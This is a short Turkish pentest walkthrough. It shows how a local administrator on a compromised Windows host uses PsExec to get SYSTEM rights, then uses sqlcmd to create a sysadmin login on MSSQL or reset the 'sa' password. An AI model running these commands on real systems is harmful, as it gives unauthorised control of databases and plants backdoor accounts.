Mevcut durumda, yerel yönetici hakkı elde edilen bilgisayardaki MSSQL uygulamasında kimlik doğrulaması olarak Mixed Mod etkindir.
Ele geçirilen bilgisayarda, yerel yönetici haklarına sahip olunmuştur.
whoami
net user hacked
Ancak yerel yönetici hakları ile veritabanlarına erişim sağlanamamaktadır.
Yerel yönetici haklarına sahip bir kullanıcı, Sysinternals Psexec aracını kullanarak SYSTEM haklarına erişim sağlayabilir.
whoami
PsExec.exe /s cmd
whoami
SYSTEM haklarına erişim sağlandıktan sonra, MSSQL üzerinde yeni bir kullanıcı oluşturulabilir ve bu hesap ile MSSQL üzerinde oturum açılabilir.
sqlcmd -S localhost
USE [master] GO
CREATE LOGIN [sa_hacked] WITH PASSWORD=N’Hh123456′
GO
EXEC master..sp_addsrvrolemember @loginame = N’sa_hacked’, @rolename = N’sysadmin’
GO
Not: Yeni kullanıcı oluşturmak yerine, (tavsiye edilmese de) mevcuttaki bir kullanıcının parolası da sıfırlanabilir.
ALTER LOGIN [sa] WITH PASSWORD=N’Ss123456′
Oluşturulan yeni kullanıcı hesabı ile MSSQL üzerinde oturum açılabilmiştir.